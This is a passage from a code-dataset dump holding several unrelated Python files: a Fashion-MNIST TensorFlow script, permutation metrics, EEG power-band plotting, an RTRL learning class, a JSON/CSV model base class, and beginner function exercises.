tf.keras.datasets.fashion_mnist.load_data()\n train_input_fn = tf.estimator.inputs.numpy_input_fn(x=x_train.astype(np.float32), y=y_train.astype(np.int32),\n shuffle=True, batch_size=128, num_epochs=10)\n test_input_fn = tf.estimator.inputs.numpy_input_fn(x=x_test.astype(np.float32), y=y_test.astype(np.int32),\n shuffle=False, batch_size=128, num_epochs=1)\n\n # estimator.train(input_fn=train_input_fn)\n train_spec = tf.estimator.TrainSpec(input_fn=train_input_fn)\n evel_spec = tf.estimator.EvalSpec(input_fn=test_input_fn)\n # estimator.train(input_fn=train_input_fn)\n tf.estimator.train_and_evaluate(estimator=estimator, train_spec=train_spec, eval_spec=evel_spec)\n","repo_name":"hjhgo/deep_learning_demo","sub_path":"fashion_minst.py","file_name":"fashion_minst.py","file_ext":"py","file_size_in_byte":5098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21259876409","text":"\"\"\"\nRodney McCoy\nThu Oct 13 13:08:41 2022\\\nrbmj2001@outlook.com \n\"\"\"\n\n\n\nimport itertools # For Basic Permutation Operations\nimport copy\n\n\n\n#%% ----- Basic Permutation Methods, Conversion and Format Checking ----- \n\n\n\n# In: Signed Permutation in 1 line notation\n# Out: Permutation in cycle notation (as disjoint cycles, not necessarily\n# transpositions) also 1 cycles are left in\ndef to_cycle(pi : list) -> list:\n cycles = []\n # For each possible value of permutation\n for i in pi.keys():\n skip = False \n # Skip if i has already been placed in cycle\n if len(cycles) != 0:\n for x in cycles:\n if i in x:\n skip = True\n if(skip):\n continue\n # If i is not swapped, add it alone to cycles, \n # Else produce the cycle that swaps i and add it to cycles\n if(pi[i] == i):\n cycles.append([i])\n else:\n j = i\n c = []\n while(True):\n if j in c:\n break\n c.append(j)\n j = pi[j] \n cycles.append(c)\n return cycles\n\n\n\n# In: A Signed Permutation in 1 Line Notation\n# Out: The Permutation Decomposed into 2 Cycles\ndef to_2_cycle(pi : list) -> list:\n # Change 1 line to disjoint cycles\n cycles = to_cycle(pi)\n \n two_cycles = []\n # For each disjoint cycle\n for c in cycles:\n # If it is already a 2 cycle, add it\n # Else decompose into 2 cycles, and add each Its decomposed in the form\n # (a_1, ..., a_n) = (a_1 a_n) (a_1 a_{n-1}) ... (a_2 a_1)\n if (len(c) == 2):\n two_cycles.append(c)\n else:\n for i in range(len(c), 1, -1): \n # (possible bug) should i go to 1+1 rather than 1 since it zero indexes\n two_cycles.append([c[0], c[i-1]])\n return two_cycles\n\n\n\n# Out: True if input is in 1 line format, false else\ndef check_1_line(pi : dict):\n if (not isinstance(pi, dict) or max(pi.keys()) != max(pi.values()) or \n min(pi.keys()) != min(pi.values()) or max(pi.keys()) != -min(pi.keys())):\n raise Exception(\"Inputed permutation is not in 1 line\")\n if 0 in pi.keys() or 0 in pi.values():\n raise Exception(\"Inputed permutation is not in 1 line\")\n\n\n\n# Out: True if input in disjoint cycles format, false else\ndef check_cycles(pi : list) -> bool:\n if not isinstance(pi, list):\n raise Exception(\"Inputed permutation is not in cycle\")\n for j in pi:\n if not isinstance(j, list):\n raise Exception(\"Inputed permutation is not in cycle\")\n\n\n\n# Out: True if input in 2 cycles format, false else\ndef check_2_cycles(pi : list) -> bool:\n if not isinstance(pi, list):\n raise Exception(\"Inputed permutation is not in 2 cycle\")\n for j in pi:\n if not isinstance(j, list) or len(j) != 2:\n raise Exception(\"Inputed permutation is not in 2 cycle\")\n\n\n\n# In: A Signed Permutation Decomposed into 1 line notation, and 2 * dim. of the\n# hypercube\n# Out: True if Permutation is Isomorphic to a Hypercube, False else\ndef is_hyper_cube(pi : list) -> bool: \n # Ensure its actually a signed permutation \n check_1_line(pi)\n \n # Ensure permutation maps opposite faces to opposite faces\n for i in range (1, max(pi.values()) + 1):\n if pi[i] != - pi[-i]:\n return False\n return True\n\n\n\n\n\n\n\n\n\n#%% ----- Metrics and \"Recursive Characterization\" Test Conditions -----\n\n\n\n# In: A Signed Permutation in 1 line notation, a 1 indexed integer i\n# Out: The permutation a|_i, created by me\ndef a_bar(a : dict, dim : int, i : int) -> list:\n # do work\n # if dim \n \n return []\n raise Exception(\"Unable to calculate a_bar / a|_i with permutation\", a)\n\n\n\n# In: A Signed Permutation in 1 line notation, and integer representing S_n,\n# the permutation group we are in\n# Out: True if permutation satisfies recursive characterization for hypercubes, else false\ndef is_equal(pi : dict, dim : int) -> bool:\n if dim <= 2:\n return True\n return False\n\n\n \n# In: A Signed Permutation in 1 line notation\n# Out: Length of the permutation. Total Amount of hypercube inversions over \n# the Permutation\ndef I_n(pi : dict) -> int:\n count = 0\n \n for i in pi.keys():\n for j in range(i+1, max(pi.keys()) + 1):\n if j == 0:\n continue\n if pi[i] > pi[j]:\n count += 1 \n\n \n count = count/2\n \n for i in range(1, max(pi)+1):\n if(pi[i] < pi[-i]):\n count += 1/2 \n \n return int(count)\n \n\n\n\n# In: A Signed Permutation in 1 line notation\n# Out: The reflection length of the permutation. Or, n - all cycles of the \n# form (i j k ) (-i -j -k). NOTE: not necessarily length three, (i j)\n# (-i -j) also counts\ndef EX_n(pi : dict) -> int:\n c_pi = to_cycle(pi)\n \n val = 0\n for i in range(len(c_pi)):\n for j in range(i+1, len(c_pi)):\n if len(c_pi[i]) != len(c_pi[j]):\n continue\n is_valid = True\n for k in c_pi[i]:\n if not -k in c_pi[j]:\n is_valid = 0\n break\n if is_valid:\n val += 1\n \n return int(len(pi)/2) - val\n\n\n\n# In: A Signed Permutation in 1 line notation\n# Out: Depth of permutation, as shown in \"depth in classic coxeter groups\"\ndef D_n(pi : dict) -> int:\n val = 0\n n = max(pi.keys())\n \n \n # calculate everything except b oddness\n for i in range(1, n +1):\n if pi[i] > i:\n val += pi[i] - i\n if pi[i] < 0:\n val += abs(pi[i]) - 1/2\n \n # calculate b oddness\n decomposition = []\n temp_1 = [0]\n while max(temp_1) < n:\n i = max(temp_1)+1\n temp_1 = []\n \n '''\n while not i in temp_1:\n temp_1.append(i)\n i = abs(pi[i])\n '''\n \n not_finished = False\n while not_finished == False:\n while not i in temp_1:\n temp_1.append(i)\n i = abs(pi[i])\n temp_1.sort()\n not_finished = True\n for j in range(len(temp_1)-1):\n if temp_1[j+1] - temp_1[j] != 1:\n not_finished = False\n i = temp_1[j] + 1\n break\n \n \n \n decomposition.append( [i for i in range(min(temp_1), max(temp_1)+1)] )\n \n \n # count sections with odd negative entries\n for d in decomposition:\n count = 0\n for i in d:\n if pi[i] < 0:\n count += 1\n if count % 2 == 1:\n val += 1/2\n \n return val\n\n\n\n# In: A Signed Permutation in 1 line notation\n# Out: D_n - I_n - EX_n using hypercube metrics\ndef K_n(h : dict) -> int:\n return D_n(h) - (I_n(h) + EX_n(h))/2\n\n\n\n\n\n\n\n\n\n#%% ----- Main Function -----\n\n\nresults1 = []\n\n\ndef main():\n max_dimension = 5\n \n for n in range(1, max_dimension+1):\n r = []\n id_n = [i for i in range(-n, n+1)]\n id_n.remove(0)\n pi = {i : 0 for i in id_n}\n print(n)\n for pi_tuple in itertools.permutations(id_n):\n for unsigned_id, signed_id in enumerate(id_n):\n pi[signed_id] = pi_tuple[unsigned_id]\n if not is_hyper_cube(pi):\n continue\n if K_n(pi) != 0 or K_n(pi) == 0:\n r.append( ( [pi[i] for i in range (1, n+1)], \n D_n(pi), I_n(pi)/2, EX_n(pi)/2, K_n(pi), \n is_equal(pi, int(len(pi)/2)))\n )\n # copy.copy(pi),\n results1.append(n)\n results1.append(r)\n \n #pi ={-3:3, -2:2, -1:1, 1:-1, 2:-2, 3:-3}\n #print((pi, D_n(pi), I_n(pi), EX_n(pi), K_n(pi) ))\n\n\nif(__name__ == \"__main__\"):\n main() ","repo_name":"RodneyMcCoy/shallow-permutations","sub_path":"src/Old Code/Hypercube_Metric_Tests.py","file_name":"Hypercube_Metric_Tests.py","file_ext":"py","file_size_in_byte":7951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"71593156745","text":"from transformers import BertTokenizer, BertModel\n\n# def paraphraseText(text):\nmodel = BertModel.from_pretrained('bert-base-uncased')\ntokenizer = BertTokenizer.from_pretrained('bert-base-uncased')\ninput_text = \"The quick brown fox jumps over the lazy dog.\"\ninput_ids = tokenizer.encode(input_text, return_tensors=\"pt\")\noutputs = model.generate(input_ids)\noutput_text = tokenizer.decode(outputs[0], skip_special_tokens=True)\n\n# Print the paraphrased text\nprint(output_text)","repo_name":"TejasNichat/Major-Project","sub_path":"youtube-transcript-summarizer-api/paraphraser.py","file_name":"paraphraser.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74688022983","text":"import mne\nimport numpy as np\nimport FeaturesExtraction \nfrom mne.event import define_target_events\nfrom mne.channels import make_1020_channel_selections\nimport pandas as pd\nimport numpy as np\nfrom statistics import mean\nimport matplotlib.pyplot as plt\nimport CreateSamples\nfrom scipy import spatial\nimport scipy\nimport TopoPB \n\n\n'''author of all function found in this file (except if specified otherwise): Alina Weinberger'''\n\n\ndef avPowerband(file_name, nb_subjects, ext):\n\n #dictionnary to acces data files (1-8) corresponding to subject n*:\n #subjects={0:3, 1:5, 2:6, 3:7, 4:10, 5:11, 6:12, 7:15, 8:17}\n\n subjects= range(nb_subjects)\n files=[]\n #bands={0:'delta',1:'theta',2:'alpha',3:'sigma',4:'beta',5:'low gamma'}\n\n #create a list of file names as found in work directory --> change as needed \n if ext == '.txt':\n for i in subjects:\n files.append(file_name +str(i)+ '.txt')\n test = np.loadtxt(files[0]) # to have right size of ave / divider array \n elif ext == '.npy':\n for i in subjects:\n files.append(file_name + str(i) + '.npy')\n test = np.load(files[0]) # to have right size of ave / divider array \n\n #empty (NaN)\n powerBlist=[pd.DataFrame(columns=['delta','theta','alpha','sigma','beta','low gamma'], index=range(len(test))) for x in subjects]\n\n\n #filled with zeros\n ave=np.zeros((len(test),6))\n divider=np.zeros((len(test),6))\n\n\n\n for i in subjects:\n \n #raw=mne.io.read_raw_edf(files[i]) #importing raw data \n #events=mne.events_from_annotations(raw) #extracting events \n\n if ext == '.txt':\n data= np.loadtxt(files[i])\n elif ext == '.npy':\n data= np.load(files[i])\n\n for j in range(len(data)):\n \n data_row=data[j] #extract data for each channel\n \n PSD=FeaturesExtraction.computePSD(data_row,300) #compute power spectral denstity for each channel \n f=PSD[0] #assign frequency and power spectral density to 2 different vectors\n p=PSD[1]\n\n powerBrow=FeaturesExtraction.computePowerBands(f, p) #compute absolute power bands for each channel\n powerBlist[i].iloc[j]=powerBrow #core.frame.DataFrame containing absolute power bands for each channel\n \n \n for k in range(len(data)): #each channel\n for y in range(6): #each band\n if not np.isnan(powerBlist[i].iloc[k,y]): \n ave[k,y] += powerBlist[i].iloc[k,y] #sum dataframes element by element\n divider[k,y] += 1 \n\n ave/=divider #average power band per electrode for all subjects\n ave= np.delete(ave, [4,33,40,43,45], axis=0)\n\n #np.save('average_PB.npy',ave) #save file \n\n #ave=np.delete(ave, (118,120,126),axis=0) #delete electrode with too high values\n \n av_delta=ave[:,0] #extract average for each band\n av_theta=ave[:,1]\n av_alpha=ave[:,2]\n #av_sigma=ave[:,3]\n av_beta=ave[:,4]\n av_lowgamma=ave[:,5]\n\n #dictio={'delta':av_delta, 'theta':av_theta, 'alpha': av_alpha, 'beta':av_beta, 'lowgamma':av_lowgamma}\n\n return av_delta, av_theta, av_alpha, av_beta, av_lowgamma\n\n\ndef avPowerband_sub(data):\n\n\n #empty (NaN)\n powerBlist=pd.DataFrame(columns=['delta','theta','alpha','sigma','beta','low gamma'], index=range(len(data)))\n\n\n #filled with zeros\n ave=np.zeros((len(data),6))\n divider=np.zeros((len(data),6))\n\n\n for j in range(len(data)):\n \n data_row=data[j] #extract data for each channel\n \n PSD=FeaturesExtraction.computePSD(data_row,1180) #compute power spectral denstity for each channel \n f=PSD[0] #assign frequency and power spectral density to 2 different vectors\n p=PSD[1]\n\n powerBrow=FeaturesExtraction.computePowerBands(f, p) #compute absolute power bands for each channel\n powerBlist.iloc[j]=powerBrow #core.frame.DataFrame containing absolute power bands for each channel\n \n \n for k in range(len(data)): #each channel\n for y in range(6): #each band\n if not np.isnan(powerBlist.iloc[k,y]): \n ave[k,y] += powerBlist.iloc[k,y] #sum dataframes element by element\n divider[k,y] += 1 \n\n ave/=divider #average power band per electrode for all subjects\n ave= np.delete(ave, [4,33,40,43,45], axis=0)\n\n #np.save('average_PB.npy',ave) #save file \n\n #ave=np.delete(ave, (118,120,126),axis=0) #delete electrode with too high values\n \n av_delta=ave[:,0] #extract average for each band\n av_theta=ave[:,1]\n av_alpha=ave[:,2]\n #av_sigma=ave[:,3]\n av_beta=ave[:,4]\n av_lowgamma=ave[:,5]\n\n #dictio={'delta':av_delta, 'theta':av_theta, 'alpha': av_alpha, 'beta':av_beta, 'lowgamma':av_lowgamma}\n\n return av_delta, av_theta, av_alpha, av_beta, av_lowgamma\n\n\n\ndef interp_elect_pos(elect_file_small, elect_file_big):\n\n elect_small = np.load(elect_file_small + '.npy') #load reference electrode positions\n elect_big = np.load(elect_file_big + '.npy') #load electrode positions to interpolate \n\n interp_idx_big=[]\n interp_elect_big=[]\n\n spat_dist= spatial.distance.cdist(elect_small, elect_big) #caluclate spatial distance between all the coordinates \n\n for i in range(len(spat_dist)):\n spat_dist_list= spat_dist[i].tolist()\n interp_idx_big.append(spat_dist_list.index(min(spat_dist_list))) #get index of minimum distance = index of nearest electrode\n\n for i in range(len(interp_idx_big)):\n interp_elect_big.append(elect_big[interp_idx_big[i]]) #get coordinates of nearest electrodes\n\n return interp_elect_big\n\ndef interp_data(list_big, elect_big, elect_small, interp_elect):\n\n elect_big = np.load(elect_big + '.npy')\n elect_small= np.load(elect_small + '.npy')\n interp_elect_big= np.load(interp_elect + '.npy')\n\n list_interp_data_big=[]\n\n for i in range(len(list_big)):\n list_interp_data_big.append(scipy.interpolate.griddata(elect_big, list_big[i], interp_elect_big))\n\n return list_interp_data_big\n\ndef interp_data2(elect_big, elect_small, list_big):\n\n second_min=100\n idx_min=[]\n idx_2min=[]\n mean_elect=[]\n interp_elect_min=[]\n interp_elect_2min=[]\n list_interp_data_big=[]\n divider=2\n\n spat_dist= spatial.distance.cdist(elect_small, elect_big)\n\n for i in range(spat_dist.shape[0]):\n \n spat_dist_list= spat_dist[i].tolist()\n minim=min(spat_dist_list)\n idx_min.append(spat_dist_list.index(minim)) \n\n for y in range(len(spat_dist_list)):\n if (spat_dist_list[y] < second_min) and (spat_dist_list[y] > minim) :\n second_min = spat_dist_list[y]\n idx_2min.append(spat_dist_list.index(second_min))\n\n for i in range(len(idx_min)):\n interp_elect_min.append(elect_big[idx_min[i]])\n interp_elect_2min.append(elect_big[idx_2min[i]])\n\n for i in range(len(interp_elect_min)):\n mean_elect.append((interp_elect_min[i]+interp_elect_2min))\n mean_elect[i]=mean_elect[i]/divider\n\n for i in range(len(list_big)):\n list_interp_data_big.append(scipy.interpolate.griddata(elect_big, list_big[i], mean_elect))\n\n return list_interp_data_big\n \n\n# mindist = np.min(spatial.distance.cdist(elect_LA, elect_DA), axis=1) \n\n\ndef array_topoplot(toplot, ch_xy, cmap='coolwarm', showtitle=False, titles=None, savefig=False, figpath=None, vmin=-3, vmax=3):\n\n '''author: Yann Harel'''\n\n #create fig\n fig, ax = plt.subplots(len(toplot),1, figsize=(20,10))\n #create a topomap for each data array\n for i, data in enumerate(toplot):\n image,_ = mne.viz.plot_topomap(data=data, pos=ch_xy, cmap=cmap, vmin=vmin, vmax=vmax, axes=ax[i], show=False)\n #option for title\n if showtitle == True:\n ax[i].set_title(titles[i], fontdict={'fontsize': 20, 'fontweight': 'heavy'})\n #add a colorbar at the end of the line (weird trick from https://www.martinos.org/mne/stable/auto_tutorials/stats-sensor-space/plot_stats_spatio_temporal_cluster_sensors.html#sphx-glr-auto-tutorials-stats-sensor-space-plot-stats-spatio-temporal-cluster-sensors-py)\n from mpl_toolkits.axes_grid1 import make_axes_locatable\n divider = make_axes_locatable(ax[0])\n ax_colorbar = divider.append_axes('right', size='5%', pad=0.05)\n plt.colorbar(image, cax=ax_colorbar)\n ax_colorbar.tick_params(labelsize=8)\n #save plot if specified\n if savefig == True:\n plt.savefig(figpath, dpi=300)\n plt.show()\n return fig, ax\n\ndef plot_dec_accu(DA=[],sensors_pos=[],mask=False,DA_thr=None,save_file=None, vmin=-3, vmax=3):\n\n '''author : Tarek Lajnef'''\n\n if mask:\n mask_default = np.full((len(DA)), False, dtype=bool)\n mask = np.array(mask_default)\n mask[DA >= DA_thr] = True\n mask_params = dict(marker='*', markerfacecolor='w', markersize=18) # significant sensors appearence\n fig = plt.figure(figsize = (10,5))\n ax,_ = mne.viz.plot_topomap(DA,sensors_pos,\n cmap='coolwarm',\n show=False,\n vmin=vmin,vmax=vmax,\n contours=True,\n mask = mask,\n mask_params = mask_params,\n extrapolate='local')\n fig.colorbar(ax, shrink=0.25)\n if save_file:\n plt.savefig(save_file, dpi = 300)\n else:\n fig = plt.figure(figsize = (10,5))\n ax,_ = mne.viz.plot_topomap(DA, sensors_pos,cmap='coolwarm',show=False,\n vmin=vmin,vmax=vmax,contours=True)\n #fig.colorbar(ax, shrink=0.25)\n if save_file:\n plt.savefig(save_file, dpi = 300)\n return ax\n\n\ndef array_plot_deccaccu(DA, ch_xy, maskk=True, DA_thr=None, marker='*', markersize=10, cmap='coolwarm', showtitle=False, titles=None, savefig=False, figpath=None, vmin=-3, vmax=3):\n\n #create fig\n fig, ax = plt.subplots(len(DA),1, figsize=(20,10))\n #create a topomap for each data array\n if maskk: \n for i, data in enumerate(DA):\n mask_default = np.full((len(DA[i])), False, dtype=bool)\n mask = np.array(mask_default)\n for j in range(len(data)):\n if data[j]> DA_thr: \n mask[j] = True\n mask_params = dict(marker=marker, markerfacecolor='w', markersize=markersize) # significant sensors appearence\n image,_ = mne.viz.plot_topomap(data=data, pos=ch_xy, cmap=cmap, vmin=vmin, vmax=vmax, axes=ax[i], contours=True, mask=mask, mask_params=mask_params, show=False)\n #option for title\n if showtitle == True:\n ax[i].set_title(titles[i], fontdict={'fontsize': 20, 'fontweight': 'heavy'})\n\n #add a colorbar at the end of the line (weird trick from https://www.martinos.org/mne/stable/auto_tutorials/stats-sensor-space/plot_stats_spatio_temporal_cluster_sensors.html#sphx-glr-auto-tutorials-stats-sensor-space-plot-stats-spatio-temporal-cluster-sensors-py)\n from mpl_toolkits.axes_grid1 import make_axes_locatable\n divider = make_axes_locatable(ax[0])\n ax_colorbar = divider.append_axes('right', size='5%', pad=0.05)\n plt.colorbar(image, cax=ax_colorbar)\n ax_colorbar.tick_params(labelsize=8)\n\n #save plot if specified\n if savefig == True:\n plt.savefig(figpath, dpi=300)\n\n plt.show()\n return fig, ax\n\ndef mean_per_subject(liste1, liste2):\n\n summ=0\n summ2=0\n list_sum=[]\n list_sum2=[]\n list_list_sum=[]\n list_list_sum2=[]\n diff=[]\n\n divider = liste1[0].shape[0]\n\n for i in range(len(liste1)): #nb_subjects\n array= liste1[0]\n for j in range(array.shape[1]): # nb electrodes\n samples=array[:,j]\n for k in range(samples.shape[0]): #nb samples\n summ+=samples[k]\n list_sum.append(summ) #list of sum of samples --> size nb electrodes \n list_list_sum.append(list_sum)\n list_sum=[]\n \n for i in range(len(list_list_sum)):\n for j in range(len(list_list_sum[i])):\n list_list_sum[i][j]/=divider #get mean for each electrode\n\n for i in range(len(liste2)): #nb_subjects\n array2= liste2[0]\n for j in range(array2.shape[1]): # nb electrodes\n samples2=array2[:,j]\n for k in range(samples2.shape[0]): #nb samples\n summ2+=samples2[k]\n list_sum2.append(summ2) #list of sum of samples --> size nb electrodes \n list_list_sum2.append(list_sum2)\n list_sum2=[]\n \n for i in range(len(list_list_sum2)):\n for j in range(len(list_list_sum2[i])):\n list_list_sum2[i][j]/=divider #get mean for each electrode\n\n for i in range(len(list_list_sum)):\n for j in range(len(list_list_sum[i])):\n diff.append((list_list_sum[i][j] - list_list_sum2[i][j])) #difference between 2 conditions \n\n return diff\n\n\n\n\n\n\n\n\n\n","repo_name":"ALINA991/Spectral-density-EEG-analysis","sub_path":"TopoPB.py","file_name":"TopoPB.py","file_ext":"py","file_size_in_byte":13221,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"43256353588","text":"from learning_algorithms.Learning_Algorithm import Learning_Algorithm\nimport numpy as np\n\nclass RTRL(Learning_Algorithm):\n \"\"\"Implements the Real-Time Recurrent Learning (RTRL) algorithm from\n Williams and Zipser 1989.\n\n RTRL maintains a long-term \"influence matrix\" dadw that represents the\n derivative of the hidden state with respect to a flattened vector of\n recurrent update parameters. We concatenate [W_rec, W_in, b_rec] along\n the column axis and order the flattened vector of parameters by stacking\n the columns end-to-end. In other words, w_k = W_{ij} when i = k%n_h and\n j = k//n_h. The influence matrix updates according to the equation\n\n M' = JM + M_immediate (1)\n\n where J is the network Jacobian and M_immediate is the immediate influence\n of a parameter w on the hidden state a. (See paper for more detailed\n notation.) M_immediate is notated as papw in the code for \"partial a partial\n w.\" For a vanilla network, this can be simply (if inefficiently) computed as\n the Kronecker product of a_hat = [a_prev, x, 1] (a concatenation of the prev\n hidden state, the input, and a constant 1 (for bias)) with the activation\n derivatives organized in a diagonal matrix. The implementation of Eq. (1)\n is in the update_learning_vars method.\n\n Finally, the algorithm returns recurrent gradients by projecting the\n feedback vector q onto the influence matrix M:\n\n dL/dw = dL/da da/dw = qM (2)\n\n Eq. (2) is implemented in the get_rec_grads method.\"\"\"\n\n def __init__(self, rnn, M_decay=1, **kwargs):\n \"\"\"Inits an RTRL instance by setting the initial dadw matrix to zero.\"\"\"\n\n self.name = 'RTRL' #Algorithm name\n allowed_kwargs_ = set() #No special kwargs for RTRL\n super().__init__(rnn, allowed_kwargs_, **kwargs)\n\n #Initialize influence matrix\n self.dadw = np.zeros((self.n_h, self.rnn.n_h_params))\n self.M_decay = M_decay\n\n def update_learning_vars(self):\n \"\"\"Updates the influence matrix via Eq. (1).\"\"\"\n\n #Get relevant values and derivatives from network.\n self.a_hat = np.concatenate([self.rnn.a_prev,\n self.rnn.x,\n np.array([1])])\n D = self.rnn.alpha * np.diag(self.rnn.activation.f_prime(self.rnn.h))\n self.papw = np.kron(self.a_hat, D) #Calculate M_immediate\n self.rnn.get_a_jacobian() #Get updated network Jacobian\n\n #Update influence matrix via Eq. (1).\n self.dadw = self.M_decay * self.rnn.a_J.dot(self.dadw) + self.papw\n\n def get_rec_grads(self):\n \"\"\"Calculates recurrent grads using Eq. (2), reshapes into original\n matrix form.\"\"\"\n\n return self.q.dot(self.dadw).reshape((self.n_h, self.m), order='F')\n\n def reset_learning(self):\n \"\"\"Resets learning algorithm by setting influence matrix to 0.\"\"\"\n\n self.dadw *= 0\n","repo_name":"omarschall/vanilla-rtrl","sub_path":"learning_algorithms/RTRL.py","file_name":"RTRL.py","file_ext":"py","file_size_in_byte":2968,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"81"} +{"seq_id":"15975847705","text":"#!/usr/bin/python3\n\"\"\"model Base\"\"\"\nimport json\n\n\nclass Base:\n \"\"\"private class attribute \"\"\"\n __nb_objects = 0\n\n def __init__(self, id=None):\n \"\"\"constructor\"\"\"\n\n if id is not None:\n self.id = id\n\n else:\n Base.__nb_objects += 1\n self.id = Base.__nb_objects\n\n @staticmethod\n def to_json_string(list_dictionaries):\n \"\"\"returns the JSON string representation\"\"\"\n if list_dictionaries is None:\n return \"[]\"\n else:\n return json.dumps(list_dictionaries)\n\n @classmethod\n def save_to_file(cls, list_objs):\n \"\"\"writes the JSON string representation\"\"\"\n file_n = cls.__name__ + \".json\"\n new_list = []\n\n with open(file_n, \"w\", encoding='utf-8') as file:\n if list_objs is None:\n file.write(cls.to_json_string([]))\n else:\n for a in list_objs:\n new_list.append(a.to_dictionary())\n cont = cls.to_json_string(new_list)\n file.write(cont)\n\n @staticmethod\n def from_json_string(json_string):\n \"\"\"return the list of the JSON string representation\"\"\"\n if json_string is None or json_string == []:\n return []\n else:\n return json.loads(json_string)\n\n @classmethod\n def create(cls, **dictionary):\n \"\"\"return an instancewith all attributes\"\"\"\n if cls.__name__ == \"Square\":\n new = cls(1, 0, 0)\n\n if cls.__name__ == \"Rectangle\":\n new = cls(1, 1, 0, 0)\n\n new.update(**dictionary)\n return new\n\n @classmethod\n def load_from_file(cls):\n \"\"\"return a list of instance\"\"\"\n filename = cls.__name__ + \".json\"\n try:\n with open(filename, encoding=\"utf-8\") as file:\n content = file.read()\n data = cls.from_json_string(content)\n lst = []\n for i in data:\n lst.append(cls.create(**i))\n return lst\n except FileNotFoundError:\n return []\n\n @classmethod\n def save_to_file_csv(cls, list_objs):\n \"\"\"writes the JSON string representation\"\"\"\n file_n = cls.__name__ + \".csv\"\n new_list = []\n\n with open(file_n, \"w\", encoding='utf-8') as file:\n if list_objs is None:\n file.write(cls.to_json_string([]))\n else:\n for a in list_objs:\n new_list.append(a.to_dictionary())\n cont = cls.to_json_string(new_list)\n file.write(cont)\n\n @classmethod\n def load_from_file_csv(cls):\n filename = cls.__name__ + \".csv\"\n try:\n with open(filename, encoding=\"utf-8\") as file:\n content = file.read()\n data = cls.from_json_string(content)\n lst = []\n for i in data:\n lst.append(cls.create(**i))\n return lst\n except FileNotFoundError:\n return []\n","repo_name":"Caroll1889/holbertonschool-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/models/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"13332790897","text":"import pickle\n\nimport pkg_resources\n\n\nclass FourCornerMethod(object):\n def __init__(self):\n data_file = pkg_resources.resource_filename(__name__, \"data/data.pkl\")\n\n with open(data_file, 'rb') as fd:\n self.data = pickle.load(fd)\n\n def query(self, input_char, default=None):\n return self.data.get(input_char, default)\n\n\nif __name__ == \"__main__\":\n fcm = FourCornerMethod()\n result = fcm.query('名')\n\n print(result)\n","repo_name":"howl-anderson/four_corner_method","sub_path":"four_corner_method/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"81"} +{"seq_id":"20443324298","text":"# -*- coding:utf-8 -*-\n# email:bingchengzhou@foxmail.com\n# create: 2020/12/14\nimport os\nimport glob\nfrom natsort import natsorted\n\n\ndef get_model_name(name):\n name_list = name.split('_')\n class_name = \"\"\n for name in name_list:\n class_name += \"{}{}\".format(name[0].upper(), name[1:])\n return class_name\n\n\ndef get_trainer_name(name):\n return \"{}{}Trainer\".format(name[0].upper(), name[1:])\n\n\ndef get_predictor_name(name):\n return \"{}{}Predictor\".format(name[0].upper(), name[1:])\n\n\ndef get_file_list(folder_path: str, p_postfix: list = None, sub_dir: bool = True) -> list:\n \"\"\"\n 获取所给文件目录里的指定后缀的文件,读取文件列表目前使用的是 os.walk 和 os.listdir ,这两个目前比 pathlib 快很多\n :param filder_path: 文件夹名称\n :param p_postfix: 文件后缀,如果为 [.*]将返回全部文件\n :param sub_dir: 是否搜索子文件夹\n :return: 获取到的指定类型的文件列表\n \"\"\"\n assert os.path.exists(folder_path) and os.path.isdir(folder_path)\n if p_postfix is None:\n p_postfix = ['.jpg']\n if isinstance(p_postfix, str):\n p_postfix = [p_postfix]\n file_list = [x for x in glob.glob(folder_path + '/**/*.*', recursive=True) if\n os.path.splitext(x)[-1] in p_postfix or '.*' in p_postfix]\n return natsorted(file_list)\n\n","repo_name":"zhou3968322/dl-lab","sub_path":"utils/common_util.py","file_name":"common_util.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11140957206","text":"def narendra(country=\"india\"):\n print(\" iam from \"+ country )\nnarendra(\"chaina\")\nnarendra(\"bangladesh\")\nnarendra(\"french\")\nnarendra()\ndef narendra1(school=\"dont\"):\n print(\"i go to \"+ school)\nnarendra1(\"collage\")\nnarendra1(\"bus\")\nnarendra1()\nnarendra1(\"daddy\")\n\n# # a=abs(6+7y)\n# # print(a) \n\n# # mylist=[True, True, False]\n# # x=all(mylist)\n# # print(x)\n\n\n# # x=ascii(\"my name is st\")\n\n\n\ndef myfunc(n):\n return lambda a:a*n\nname=myfunc(2)\nname1=myfunc(9)\n\n# # print(name(2))\n# # print(name1(1345)) \n\n\n\n\"\"\" def add(a,b):\n# c=a+b\n# return c\n# solution=add(1123,34567)\n# print(solution)\n\n\n# def fact(a,b=20):\n# print(a,b)\n# fact(8)or(3)\"\"\"\n\n\n\n\n# def display(a,b,c):\n# print(a,b,c)\n# display(c=67,b=8,a=45)\n\n\n# def display(*marks):\n# print(marks)\n# display(12,3,4,4,5,5,66,67,678,7,7,88889,9,) \n\n\n# a=int(input(\"enter value:\"))\n# b=int(input(\"enter value:\"))\n# c=a+b\n# print(c)\n\n# a=3+5j\n# print(abs(a))\n\n\n# def sum():\n# a=23\n# b=29\n# c=a+b\n# return c\n# print(sum())\n\n \n\n\n\n# def my_function(name):\n# print(\"hi\", name)\n# my_function(\"jaswik\")\n\n\n\n# def sum(a,b):\n# return a+b\n# a=int(input(\"enter value of a:\"))\n# b=int(input(\"enter value of b:\"))\n \n \n# print(\"te sum of a,b is\",sum(a,b))\n\n\n\n\n# def change_list(list1):\n# list1.append(20)\n# list1.append(27)\n# print(\"list inside function:\",list1)\n# list1=[20,4,5,6,78,]\n# change_list(list1)\n# print(\"out side function :\", list1) \n\n\n# positional arguments\n\nfrom os import name\n\n\ndef function(school):\n name=\"hi \"+ school\n return 